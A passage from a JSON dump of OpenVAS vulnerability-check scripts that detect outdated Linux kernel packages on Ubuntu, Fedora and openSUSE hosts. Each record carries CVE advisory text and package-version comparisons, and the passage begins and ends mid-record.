"http://plugins.openvas.org/nasl.php?oid=1361412562310842854", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-3050-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-3050-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842854\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-11 05:37:36 +0200 (Thu, 11 Aug 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-3961\", \"CVE-2016-4470\", \"CVE-2016-5243\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-3050-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\nVitaly Kuznetsov discovered that the Linux kernel did not properly suppress\nhugetlbfs support in X86 paravirtualized guests. An attacker in the guest\nOS could cause a denial of service (guest system crash). (CVE-2016-3961)\n\nIt was discovered that the keyring implementation in the Linux kernel did\nnot ensure a data structure was initialized before referencing it after an\nerror condition occurred. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2016-4470)\n\nKangjie Lu discovered an information leak in the netlink implementation of\nthe Linux kernel. A local attacker could use this to obtain sensitive\ninformation from kernel memory. (CVE-2016-5243)\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3050-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3050-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1485-omap4\", ver:\"3.2.0-1485.112\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3961", "CVE-2016-5243", "CVE-2016-4470", "CVE-2016-3134"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-08-11T00:00:00", "id": "OPENVAS:1361412562310842850", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842850", "type": "openvas", "title": "Ubuntu Update for linux USN-3049-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3049-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842850\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-11 05:37:15 +0200 (Thu, 11 Aug 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-3961\", \"CVE-2016-4470\", \"CVE-2016-5243\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3049-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\nVitaly Kuznetsov discovered that the Linux kernel did not properly suppress\nhugetlbfs support in X86 paravirtualized guests. An attacker in the guest\nOS could cause a denial of service (guest system crash). (CVE-2016-3961)\n\nIt was discovered that the keyring implementation in the Linux kernel did\nnot ensure a data structure was initialized before referencing it after an\nerror condition occurred. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2016-4470)\n\nKangjie Lu discovered an information leak in the netlink implementation of\nthe Linux kernel. A local attacker could use this to obtain sensitive\ninformation from kernel memory. (CVE-2016-5243)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3049-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3049-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-107-generic\", ver:\"3.2.0-107.148\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-107-generic-pae\", ver:\"3.2.0-107.148\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-107-highbank\", ver:\"3.2.0-107.148\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-107-omap\", ver:\"3.2.0-107.148\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-107-powerpc-smp\", ver:\"3.2.0-107.148\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-107-powerpc64-smp\", ver:\"3.2.0-107.148\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-107-virtual\", ver:\"3.2.0-107.148\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:1361412562310808914", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808914", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-63ee0999e4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-63ee0999e4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808914\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:54:58 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-4470\", \"CVE-2016-1583\", \"CVE-2016-4998\", \"CVE-2016-4997\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-63ee0999e4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-63ee0999e4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/57USMCT2MVQZR6AHRMSAA74YEHCO2OKA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.4.14~200.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-07-02T00:00:00", "id": "OPENVAS:1361412562310808522", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808522", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-1c409313f4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-1c409313f4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808522\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-02 06:38:59 +0200 (Sat, 02 Jul 2016)\");\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5728\",\n \"CVE-2016-4997\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-1c409313f4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-1c409313f4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6AP44WYNH7WHAMP5WVQMJC3Z55GPMFJJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.6.3~300.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:57:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5244", "CVE-2015-8551", "CVE-2016-2053", "CVE-2016-5828", "CVE-2016-4486", "CVE-2014-9904", "CVE-2016-1583", "CVE-2016-0758", "CVE-2016-4569", "CVE-2016-5829", "CVE-2016-4997", "CVE-2016-4482", "CVE-2015-7833", "CVE-2016-4578", "CVE-2016-4805", "CVE-2015-8552", "CVE-2016-4470", "CVE-2016-4565", "CVE-2015-8845", "CVE-2016-3672", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-08-30T00:00:00", "id": "OPENVAS:1361412562310851388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851388", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2016:2184-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851388\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-30 05:44:46 +0200 (Tue, 30 Aug 2016)\");\n script_cve_id(\"CVE-2014-9904\", \"CVE-2015-7833\", \"CVE-2015-8551\", \"CVE-2015-8552\",\n \"CVE-2015-8845\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\",\n \"CVE-2016-3672\", \"CVE-2016-4470\", \"CVE-2016-4482\", \"CVE-2016-4486\",\n \"CVE-2016-4565\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4805\",\n \"CVE-2016-4997\", \"CVE-2016-4998\", \"CVE-2016-5244\", \"CVE-2016-5828\",\n \"CVE-2016-5829\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2016:2184-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE 13.1 kernel was updated to 3.12.62 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2014-9904: The snd_compress_check_input function in\n sound/core/compress_offload.c in the ALSA subsystem in the Linux kernel\n did not properly check for an integer overflow, which allowed local\n users to cause a denial of service (insufficient memory allocation) or\n possibly have unspecified other impact via a crafted\n SNDRV_COMPRESS_SET_PARAMS ioctl call (bnc#986811).\n\n - CVE-2015-7833: The usbvision driver in the Linux kernel allowed\n physically proximate attackers to cause a denial of service (panic) via\n a nonzero bInterfaceNumber value in a USB device descriptor (bnc#950998).\n\n - CVE-2015-8551: The PCI backend driver in Xen, when running on an x86\n system and using Linux 3.1.x through 4.3.x as the driver domain, allowed\n local guest administrators to hit BUG conditions and cause a denial of\n service (NULL pointer dereference and host OS crash) by leveraging a\n system with access to a passed-through MSI or MSI-X capable physical PCI\n device and a crafted sequence of XEN_PCI_OP_* operations, aka 'Linux\n pciback missing sanity checks (bnc#957990).\n\n - CVE-2015-8552: The PCI backend driver in Xen, when running on an x86\n system and using Linux 3.1.x through 4.3.x as the driver domain, allowed\n local guest administrators to generate a continuous stream of WARN\n messages and cause a denial of service (disk consumption) by leveraging\n a system with access to a passed-through MSI or MSI-X capable physical\n PCI device and XEN_PCI_OP_enable_msi operations, aka 'Linux pciback\n missing sanity checks (bnc#957990).\n\n - CVE-2015-8845: The tm_reclaim_thread function in\n arch/powerpc/kernel/process.c in the Linux kernel on powerpc platforms\n did not ensure that TM suspend mode exists before proceeding with a\n tm_reclaim call, which allowed local users to cause a denial of service\n (TM Bad Thing exception and panic) via a crafted application (bnc#975531\n bsc#975533).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bnc#979867).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling. (bsc#983143)\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attac ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2184-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop\", rpm:\"cloop~2.639~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debuginfo\", rpm:\"cloop-debuginfo~2.639~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debugsource\", rpm:\"cloop-debugsource~2.639~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default\", rpm:\"cloop-kmp-default~2.639_k3.12.62_52~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default-debuginfo\", rpm:\"cloop-kmp-default-debuginfo~2.639_k3.12.62_52~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop\", rpm:\"cloop-kmp-desktop~2.639_k3.12.62_52~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop-debuginfo\", rpm:\"cloop-kmp-desktop-debuginfo~2.639_k3.12.62_52~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen\", rpm:\"cloop-kmp-xen~2.639_k3.12.62_52~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen-debuginfo\", rpm:\"cloop-kmp-xen-debuginfo~2.639_k3.12.62_52~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash\", rpm:\"crash~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debuginfo\", rpm:\"crash-debuginfo~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debugsource\", rpm:\"crash-debugsource~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic\", rpm:\"crash-eppic~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic-debuginfo\", rpm:\"crash-eppic-debuginfo~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore\", rpm:\"crash-gcore~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore-debuginfo\", rpm:\"crash-gcore-debuginfo~7.0.2~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default\", rpm:\"crash-kmp-default~7.0.2_k3.12.62_52~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default-debuginfo\", rpm:\"crash-kmp-default-debuginfo~7.0.2_k3.12.62_52~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop\", rpm:\"crash-kmp-desktop~7.0.2_k3.12.62_52~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop-debuginfo\", rpm:\"crash-kmp-desktop-debuginfo~7.0.2_k3.12.62_52~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen\", rpm:\"crash-kmp-xen~7.0.2_k3.12.62_52~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen-debuginfo\", rpm:\"crash-kmp-xen-debuginfo~7.0.2_k3.12.62_52~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-debugsource\", rpm:\"hdjmod-debugsource~1.28~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default\", rpm:\"hdjmod-kmp-default~1.28_k3.12.62_52~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default-debuginfo\", rpm:\"hdjmod-kmp-default-debuginfo~1.28_k3.12.62_52~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop\", rpm:\"hdjmod-kmp-desktop~1.28_k3.12.62_52~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop-debuginfo\", rpm:\"hdjmod-kmp-desktop-debuginfo~1.28_k3.12.62_52~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen\", rpm:\"hdjmod-kmp-xen~1.28_k3.12.62_52~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen-debuginfo\", rpm:\"hdjmod-kmp-xen-debuginfo~1.28_k3.12.62_52~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset\", rpm:\"ipset~6.21.1~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debuginfo\", rpm:\"ipset-debuginfo~6.21.1~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debugsource\", rpm:\"ipset-debugsource~6.21.1~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-devel\", rpm:\"ipset-devel~6.21.1~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default\", 